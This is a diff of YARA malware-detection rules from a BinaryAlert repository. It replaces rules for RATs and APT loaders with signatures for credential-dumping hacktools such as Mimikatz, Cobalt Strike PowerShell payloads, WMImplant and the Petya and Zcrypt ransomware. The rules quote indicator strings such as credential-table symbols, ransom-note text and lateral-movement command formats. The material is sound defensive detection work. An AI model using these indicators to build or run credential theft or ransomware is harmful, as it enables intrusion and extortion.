-		$a5 = "Persistence unsuccessful," wide ascii
+		$s1 = "kiwifilter.log" fullword wide
+		$s2 = "kiwissp.log" fullword wide
+		$s3 = "mimilib.dll" fullword ascii wide
 
 	condition:
-		all of ( $a* )
+		any of them
 }
-rule BINARYALERT_Malware_Windows_Xrat_Quasarrat
+rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Powershell : FILE
 {
 	meta:
-		description = "xRAT is a derivative of QuasarRAT; this catches both RATs."
-		author = "@mimeframe"
-		id = "f4db2402-3653-5525-a137-de2de29cef28"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/quasar/QuasarRAT"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_xrat_quasarrat.yara#L1-L31"
+		description = "Detection of the PowerShell payloads from Cobalt Strike"
+		author = "@javutin, @joseselvi"
+		id = "155f181a-56cb-5295-a903-744f79012733"
+		date = "2017-12-14"
+		modified = "2017-12-14"
+		reference = "https://www.cobaltstrike.com/help-payload-generator"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_powershell.yara#L1-L21"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "92533157a62ccae5d1bdc9d0bb7511817422c6b5d75d013a15173cd1121d099e"
+		logic_hash = "39dd0aaa84d02aae5766d764c3d371f03f9df33acf5f6ae4ab4a8c73dd827213"
 		score = 75
-		quality = 30
-		tags = ""
+		quality = 80
+		tags = "FILE"
 
 	strings:
-		$a1 = ">> New Session created" wide ascii
-		$a2 = ">> Session unexpectedly closed" wide ascii
-		$a3 = ">> Session closed" wide ascii
-		$a4 = "session unexpectedly closed" wide ascii
-		$a5 = "cmd" fullword wide ascii
-		$a6 = "/K" fullword wide ascii
-		$b1 = "echo DONT CLOSE THIS WINDOW!" wide ascii
-		$b2 = "ping -n 20 localhost > nul" wide ascii
-		$b3 = "Downloading file..." wide ascii
-		$b4 = "Visited Website" wide ascii
-		$b5 = "Adding Autostart Item failed!" wide ascii
-		$b6 = ":Zone.Identifier" wide ascii
-		$c1 = "GetDrives I/O error" wide ascii
-		$c2 = "/r /t 0" wide ascii
-		$c3 = "desktop.ini" wide ascii
-		$c4 = "WAN IP Address" wide ascii
-		$c5 = "User refused the elevation request." wide ascii
-		$c6 = "Process already elevated." wide ascii
+		$ps1 = "Set-StrictMode -Version 2"
+		$ps2 = "func_get_proc_address"
+		$ps3 = "func_get_delegate_type"
+		$ps4 = "FromBase64String"
+		$ps5 = "VirtualAlloc"
+		$ps6 = "var_code"
+		$ps7 = "var_buffer"
+		$ps8 = "var_hthread"
 
 	condition:
-		5 of ( $a* ) or 5 of ( $b* ) or 5 of ( $c* )
+		$ps1 at 0 and filesize < 1000KB and all of ( $ps* )
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Loki2Crypto
+rule BINARYALERT_Hacktool_Windows_Mimikatz_Errors
 {
 	meta:
-		description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */"
-		author = "Costin Raiu, Kaspersky Lab"
-		id = "eb5fc283-4994-5db5-965d-e90caad95f4c"
+		description = "Mimikatz credential dump tool: Error messages"
+		author = "@fusionrace"
+		id = "94d50739-fc84-5bfe-821d-5e2851f681e3"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_loki2crypto.yara#L1-L16"
+		reference = "https://github.com/gentilkiwi/mimikatz"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_errors.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "abb2093844af1b854a9deed5baab3f4d67bd1189a4520f697aa69b7441d9488c"
+		logic_hash = "60fb94b9465b19af3b2df1b26490d4ac19a31a39f2f8c52f1059d37843769b36"
 		score = 75
 		quality = 80
 		tags = ""
-		md5_1 = "19fbd8cbfb12482e8020a887d6427315"
-		md5_2 = "ea06b213d5924de65407e8931b1e4326"
-		md5_3 = "14ecd5e6fc8e501037b54ca263896a11"
-		md5_4 = "e079ec947d3d4dacb21e993b760a65dc"
-		md5_5 = "edf900cebb70c6d1fcab0234062bfc28"
+		md5_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
+		md5_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$modulus = {DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49}
+		$s1 = "[ERROR] [LSA] Symbols" fullword ascii wide
+		$s2 = "[ERROR] [CRYPTO] Acquire keys" fullword ascii wide
+		$s3 = "[ERROR] [CRYPTO] Symbols" fullword ascii wide
+		$s4 = "[ERROR] [CRYPTO] Init" fullword ascii wide
 
 	condition:
-		$modulus
+		all of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Xk_Keylogger
+rule BINARYALERT_Hacktool_Windows_Mimikatz_Sekurlsa
 {
 	meta:
-		description = "Rule to detect Moonlight Maze 'xk' keylogger"
-		author = "Kaspersky Lab"
-		id = "5623021d-0d70-59b3-ae30-522e81552da0"
+		description = "Mimikatz credential dump tool"
+		author = "@fusionrace"
+		id = "08fe62c5-f7a4-5985-a298-1d3c2c1744d4"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_xk_keylogger.yara#L1-L22"
+		reference = "https://github.com/gentilkiwi/mimikatz"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_sekurlsa.yara#L1-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "430027b41aeda9a11dadec2e4d3dd2474852ff3a7656ed7128711a1574e66b8f"
+		logic_hash = "24e958c3cbda8e01dc2d84b3059114ea23f4b38db1676f7b72e5eabfa52b7335"
 		score = 75
-		quality = 30
+		quality = 80
 		tags = ""
+		SHA256_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
+		SHA256_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$a1 = "Log ended at => %s"
-		$a2 = "Log started at => %s [pid %d]"
-		$a3 = "/var/tmp/task" fullword
-		$a4 = "/var/tmp/taskhost" fullword
-		$a5 = "my hostname: %s"
-		$a6 = "/var/tmp/tasklog"
-		$a7 = "/var/tmp/.Xtmp01" fullword
-		$a8 = "myfilename=-%s-"
-		$a9 = "/var/tmp/taskpid"
-		$a10 = "mypid=-%d-" fullword
-		$a11 = "/var/tmp/taskgid" fullword
-		$a12 = "mygid=-%d-" fullword
+		$s1 = "dpapisrv!g_MasterKeyCacheList" fullword ascii wide
+		$s2 = "lsasrv!g_MasterKeyCacheList" fullword ascii wide
+		$s3 = "!SspCredentialList" ascii wide
+		$s4 = "livessp!LiveGlobalLogonSessionList" fullword ascii wide
+		$s5 = "wdigest!l_LogSessList" fullword ascii wide
+		$s6 = "tspkg!TSGlobalCredTable" fullword ascii wide
 
 	condition:
-		3 of ( $a* )
+		all of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_Encrypted_Keyloger
+rule BINARYALERT_Hacktool_Windows_Ncc_Wmicmd
 {
 	meta:
-		description = "Rule to detect Moonlight Maze encrypted keylogger logs"
-		author = "Kaspersky Lab"
-		id = "4f290d77-5cb5-5f07-98fd-1829e2f00e63"
+		description = "Command shell wrapper for WMI"
+		author = "@mimeframe"
+		id = "18bc36f7-b97a-5bce-a68b-c349713e9468"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://en.wikipedia.org/wiki/Moonlight_Maze"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_encrypted_keyloger.yara#L1-L11"
+		reference = "https://github.com/nccgroup/WMIcmd"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_ncc_wmicmd.yara#L1-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "cdcbe112ae394ce0922647904f70cfae626d413d1770b0e20d2ba49e1f4e2d2d"
+		logic_hash = "bef6828a706dcfc3b573523fccd391a5ef3fa505235b1621a82527d64d32aaf0"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = {47 01 22 2A 6D 3E 39 2C}
+		$a1 = "Need to specify a username, domain and password for non local connections" wide ascii
+		$a2 = "WS-Management is running on the remote host" wide ascii
+		$a3 = "firewall (if enabled) allows connections" wide ascii
+		$a4 = "WARNING: Didn't see stdout output finished marker - output may be truncated" wide ascii
+		$a5 = "Command sleep in milliseconds - increase if getting truncated output" wide ascii
+		$b1 = "0x800706BA" wide ascii
+		$b2 = "NTLMDOMAIN:" wide ascii
+		$b3 = "cimv2" wide ascii
 
 	condition:
-		($a1 at 0 )
+		any of ( $a* ) or all of ( $b* )
 }
-rule BINARYALERT_Malware_Windows_Remcos_Rat
+rule BINARYALERT_Hacktool_Windows_Hot_Potato
 {
 	meta:
 		description = "No description has been set in the source file - BinaryAlert"
 		author = "@mimeframe"
-		id = "420c135f-3150-5cb9-9c1c-105cd260d713"
+		id = "dee13640-b4a9-5a39-af01-338c0197c995"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://breaking-security.net/remcos/remcos-changelog/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_remcos_rat.yara#L1-L20"
+		reference = "https://github.com/foxglovesec/Potato"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_hot_potato.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "c8dafe143fe1d81ae6a3c0cd4724b272"
-		logic_hash = "ec1ec69f628111235bafad8177482256ed571c064a81f01b6ec2643dccc926ad"
+		logic_hash = "1ccee61660b3478294a5a4e1ca2b16c91156f6c877d0f83848cccd18a3f753f7"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "[Following text has been pasted from clipboard:]" wide ascii
-		$a2 = "[Chrome StoredLogins found, cleared!]" wide ascii
-		$a3 = "[Firefox StoredLogins cleared!]" wide ascii
-		$b1 = "getclipboard" wide ascii
-		$b2 = "stopmiccapture" wide ascii
-		$b3 = "downloadfromurltofile" wide ascii
-		$b4 = "getcamsingleframe" wide ascii
-		$c1 = "Breaking-Security.Net" wide ascii
-		$c2 = "REMCOS v" wide ascii
+		$a1 = "Parsing initial NTLM auth..." wide ascii
+		$a2 = "Got PROPFIND for /test..." wide ascii
+		$a3 = "Starting NBNS spoofer..." wide ascii
+		$a4 = "Exhausting UDP source ports so DNS lookups will fail..." wide ascii
+		$a5 = "Usage: potato.exe -ip" wide ascii
 
 	condition:
-		any of ( $a* ) or 3 of ( $b* ) or all of ( $c* )
+		any of ( $a* )
 }
-rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_3
+rule BINARYALERT_Hacktool_Windows_Rdp_Cmd_Delivery
 {
 	meta:
-		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
+		description = "Delivers a text payload via RDP (rubber ducky)"
 		author = "@fusionrace"
-		id = "bdcc0c30-3aa7-5c92-8205-9b360d10ac59"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://securelist.com/introducing-whitebear/81638/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_3.yara#L1-L16"
+		id = "8d035721-34ee-566f-8851-1c9501de2704"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_rdp_cmd_delivery.yara#L1-L14"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "b099b82acb860d9a9a571515024b35f0"
-		logic_hash = "955aad2d72407baa7fb71e04b51557649a6f91633f5bdb1a8792e328a1587d23"
+		logic_hash = "98bc02bb651fba069828b5960ee47542828f0d530e5e280b15abb0573b8e0168"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$c1 = "{531511FA-190D-5D85-8A4A-279F2F592CC7}" wide ascii
-		$c2 = "IsLoaderAlreadyWork" wide ascii
-		$c3 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%03x%01x-%01x" wide ascii
-		$c4 = "\\\\.\\pipe\\Winsock2\\CatalogChangeListener-%02x%02x-%01x" wide ascii
+		$s1 = "Usage: rdp-cmd-delivery.sh OPTIONS" ascii wide
+		$s2 = "[--tofile 'c:\\test.txt' local.ps1 #will copy contents of local.ps1 to c:\\test.txt" ascii wide
+		$s3 = "-cmdfile local.bat                #will execute everything from local.bat" ascii wide
+		$s4 = "To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console" ascii wide
 
 	condition:
-		all of ( $c* )
+		any of them
 }
-rule BINARYALERT_Malware_Windows_Moonlightmaze_U_Logcleaner : FILE
+rule BINARYALERT_Hacktool_Windows_Moyix_Creddump
 {
 	meta:
-		description = "Rule to detect log cleaners based on utclean.c"
-		author = "Kaspersky Lab"
-		id = "2dc1b796-c8fe-5a87-9d6b-3a322f4a43ab"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "http://cd.textfiles.com/cuteskunk/Unix-Hacking-Exploits/utclean.c"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_moonlightmaze_u_logcleaner.yara#L3-L18"
+		description = "creddump is a python tool to extract credentials and secrets from Windows registry hives."
+		author = "@mimeframe"
+		id = "46df781a-abab-5593-99f9-1a6b993904cb"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/moyix/creddump"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_moyix_creddump.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "65fe29075294dfad06f4cca631d5d2f1283c439e9a5913f503fe6e4bb1f5f70a"
+		logic_hash = "3f2f4c5069fcb3d3b1d293a471bcf9489f058f27cd385885ab2bb4f719a3bd9d"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		md5_1 = "d98796dcda1443a37b124dbdc041fe3b"
-		md5_2 = "73a518f0a73ab77033121d4191172820"
+		tags = ""
 
 	strings:
-		$a1 = "Hiding complit...n"
-		$a2 = "usage: %s <username> <fixthings> [hostname]"
-		$a3 = "ls -la %s* ; /bin/cp  ./wtmp.tmp %s; rm  ./wtmp.tmp"
+		$a1 = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%" wide ascii
+		$a2 = "0123456789012345678901234567890123456789" wide ascii
+		$a3 = "NTPASSWORD" wide ascii
+		$a4 = "LMPASSWORD" wide ascii
+		$a5 = "aad3b435b51404eeaad3b435b51404ee" wide ascii
+		$a6 = "31d6cfe0d16ae931b73c59d7e0c089c0" wide ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and ( any of them )
+		all of ( $a* )
 }
-rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_2
+rule BINARYALERT_Hacktool_Windows_Wmi_Implant
 {
 	meta:
-		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
+		description = "A PowerShell based tool that is designed to act like a RAT"
 		author = "@fusionrace"
-		id = "d97b7fe1-7ff3-5cc0-9085-140ed523421f"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://securelist.com/introducing-whitebear/81638/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_2.yara#L1-L17"
+		id = "cd90ef31-6e15-5518-8278-98e99e379916"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_wmi_implant.yara#L1-L21"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "06bd89448a10aa5c2f4ca46b4709a879"
-		logic_hash = "9bb7fc3b3bf7f91efbba128895bb61b5a1bbdb6625d84836956de5e884ae3fe1"
+		logic_hash = "8b02fd265b04b9675a99b9638fdd179c8a86ed3afd7506195f3d3dcb2417d74d"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$b1 = "i cunt waiting anymore #%d" wide ascii
-		$b2 = "lights aint turnt off with #%d" wide ascii
-		$b3 = "Not find process" wide ascii
-		$b4 = "CMessageProcessingSystem::Receive_TAKE_NOP" wide ascii
-		$b5 = "CMessageProcessingSystem::Receive_TAKE_CAN_NOT_WORK" wide ascii
+		$s1 = "This really isn't applicable unless you are using WMImplant interactively." fullword ascii wide
+		$s2 = "What command do you want to run on the remote system? >" fullword ascii wide
+		$s3 = "Do you want to [create] or [delete] a string registry value? >" fullword ascii wide
+		$s4 = "Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >" fullword ascii wide
+		$s5 = "What is the name of the service you are targeting? >" fullword ascii wide
+		$s6 = "This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine" fullword ascii wide
+		$s7 = "gen_cli - Generate the CLI command to execute a command via WMImplant" fullword ascii wide
+		$s8 = "exit - Exit WMImplant" fullword ascii wide
+		$s9 = "Lateral Movement Facilitation" fullword ascii wide
+		$s10 = "vacant_system - Determine if a user is away from the system." fullword ascii wide
+		$s11 = "Please provide the ProcessID or ProcessName flag to specify the process to kill!" fullword ascii wide
 
 	condition:
-		3 of ( $b* )
+		any of them
 }
-rule BINARYALERT_Malware_Windows_Apt_Whitebear_Binary_Loader_1
+rule BINARYALERT_Ransomware_Windows_Petya_Variant_1
 {
 	meta:
-		description = "The WhiteBear loader contains a set of messaging and injection components that support continued presence on victim hosts"
+		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
 		author = "@fusionrace"
-		id = "6b5709fd-a923-56b6-98ab-ae036f9d04c3"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://securelist.com/introducing-whitebear/81638/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_whitebear_binary_loader_1.yara#L1-L22"
+		id = "bf56c0e4-585c-509b-a182-a93c74be7524"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara#L1-L18"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "b099b82acb860d9a9a571515024b35f0"
-		logic_hash = "f6706c66a378b80d3cedf118a812d8add60e12b44402a30d941d08ff30c7ab1c"
+		hash = "71b6a493388e7d0b40c83ce903bc6b04"
+		logic_hash = "3733834ee2271a483739b09c4222d222aa4899cab48fd8fc558bdbd9a66bf2d6"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "### PE STORAGE ###" wide ascii
-		$a2 = "### CRYPTO 0 ###" wide ascii
-		$a3 = "### EXTERNAL STORAGE ###" wide ascii
-		$a4 = "### CRYPTO 1 ###" wide ascii
-		$a5 = "### QUEUES ###" wide ascii
-		$a6 = "### TRANSPORT ###" wide ascii
-		$a7 = "### EXECUTION SUBSYSTEM ###" wide ascii
-		$a8 = "### AUTORUN MANAGER ###" wide ascii
-		$a9 = "### INJECT MANAGER ###" wide ascii
-		$a10 = "### LOCAL TRANSPORT MANAGER ###" wide ascii
+		$s1 = "Ooops, your important files are encrypted." fullword ascii wide
+		$s2 = "Send your Bitcoin wallet ID and personal installation key to e-mail" fullword ascii wide
+		$s3 = "wowsmith123456@posteo.net. Your personal installation key:" fullword ascii wide
+		$s4 = "Send $300 worth of Bitcoin to following address:" fullword ascii wide
+		$s5 = "have been encrypted.  Perhaps you are busy looking for a way to recover your" fullword ascii wide
+		$s6 = "need to do is submit the payment and purchase the decryption key." fullword ascii wide
 
 	condition:
-		6 of ( $a* )
+		any of them
 }
-rule BINARYALERT_Malware_Windows_Apt_Red_Leaves_Generic
+rule BINARYALERT_Ransomware_Windows_Zcrypt
 {
 	meta:
-		description = "Red Leaves malware, related to APT10"
-		author = "David Cannings"
-		id = "e0067b05-eb4a-52ec-8f35-9336a631f03b"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Red%20Leaves/Source/Red%20Leaves%20technical%20note%20v1.0.md"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_apt_red_leaves_generic.yara#L1-L27"
+		description = "Zcrypt will encrypt data and append the .zcrypt extension to the filenames"
+		author = "@fusionrace"
+		id = "d79cd266-4e77-562c-975c-8bf72efe7242"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://blog.malwarebytes.com/threat-analysis/2016/06/zcrypt-ransomware/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara#L1-L23"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "81df89d6fa0b26cadd4e50ef5350f341"
-		logic_hash = "be03bba9d01e6584b5849514656fd7de866c478f343c0bc618d7dbeda1771696"
+		hash = "d1e75b274211a78d9c5d38c8ff2e1778"
+		logic_hash = "df4073363da162e69f29493b5bfb4cb3f3d342357335c13ba6a3ac868607cb25"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = ""
 
 	strings:
-		$a1 = "Feb 04 2015"
-		$a2 = "I can not start %s"
-		$a3 = "dwConnectPort" fullword
-		$a4 = "dwRemoteLanPort" fullword
-		$a5 = "strRemoteLanAddress" fullword
-		$a6 = "strLocalConnectIp" fullword
-		$a7 = "\\\\.\\pipe\\NamePipe_MoreWindows" wide
-		$a8 = "RedLeavesCMDSimulatorMutex" wide
-		$a9 = "(NT %d.%d Build %d)" wide
-		$a10 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" wide
-		$a11 = "red_autumnal_leaves_dllmain.dll" wide ascii
-		$a12 = "__data" wide
-		$a13 = "__serial" wide
-		$a14 = "__upt" wide
-		$a15 = "__msgid" wide
+		$u1 = "How to Buy Bitcoins" ascii wide
+		$u2 = "ALL YOUR PERSONAL FILES ARE ENCRYPTED" ascii wide
+		$u3 = "Click Here to Show Bitcoin Address" ascii wide
+		$u4 = "MyEncrypter2.pdb" fullword ascii wide
+		$g1 = ".p7b" fullword ascii wide
+		$g2 = ".p7c" fullword ascii wide
+		$g3 = ".pdd" fullword ascii wide
+		$g4 = ".pef" fullword ascii wide
+		$g5 = ".pem" fullword ascii wide
+		$g6 = "How to decrypt files.html" fullword ascii wide
 
 	condition:
-		7 of ( $a* )
+		any of ( $u* ) or all of ( $g* )
 }
-rule BINARYALERT_Malware_Windows_T3Ntman_Crunchrat
+rule BINARYALERT_Ransomware_Windows_Petya_Variant_2
 {
 	meta:
-		description = "HTTPS-based Remote Administration Tool (RAT)"
-		author = "@mimeframe"
-		id = "c5b0d183-8822-505a-a1ff-7d6f75a3f174"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/t3ntman/CrunchRAT"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_t3ntman_crunchrat.yara#L1-L19"
+		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
+		author = "@fusionrace"
+		id = "6401fd7e-5ef7-58b5-b8d3-a63c70e8daa3"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_2.yara#L1-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "b5216b2b30d22f3d3848e1fb6e4245c558366fb8cd35b70f10fa4e605e211204"
+		hash = "71b6a493388e7d0b40c83ce903bc6b04"
+		logic_hash = "7e04ffd0423cd1288af5c045bb06930abb732c0ea059e329cafc05faecb4f982"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = ""
 
 	strings:
-		$a1 = "<action>command<action>" wide ascii
-		$a2 = "<action>upload<action>" wide ascii
-		$a3 = "<action>download<action>" wide ascii
-		$a4 = "cmd.exe" wide ascii
-		$a5 = "application/x-www-form-urlencoded" wide ascii
-		$a6 = "&action=" wide ascii
-		$a7 = "&secondary=" wide ascii
-		$a8 = "<secondary>" wide ascii
-		$a9 = "<action>" wide ascii
+		$s1 = "dllhost.dat" fullword wide
+		$s2 = "\\\\%ws\\admin$\\%ws" fullword wide
+		$s3 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\"" fullword wide
+		$s4 = "\\\\.\\PhysicalDrive" fullword wide
+		$s5 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip." fullword wide
 
 	condition:
-		all of ( $a* )
+		3 of them
 }
-rule BINARYALERT_Ccleaner_Backdoor
+rule BINARYALERT_Ransomware_Windows_Petya_Variant_Bitcoin
 {
 	meta:
-		description = "Ccleaner 5.33 backdoor with a possible APT17/Group72 connection."
+		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE: Bitcoin"
 		author = "@fusionrace"
-		id = "769e4fcb-9638-5a5b-8b73-a1cda3bc286a"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/windows/malware_windows_ccleaner_backdoor.yara#L1-L15"
+		id = "82d6ecc5-7c90-5d50-90ff-f54f8d87685d"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_bitcoin.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "ce3fc54d58e337ab17e6f1ba7745c593210483c02ed3969059a8fe6682d87218"
+		hash = "71b6a493388e7d0b40c83ce903bc6b04"
+		logic_hash = "9a5e183aa8e1387e76d5df4e967943b730ba780b6758af3ef23e21bb9e4ce3a6"
 		score = 75
 		quality = 80
 		tags = ""
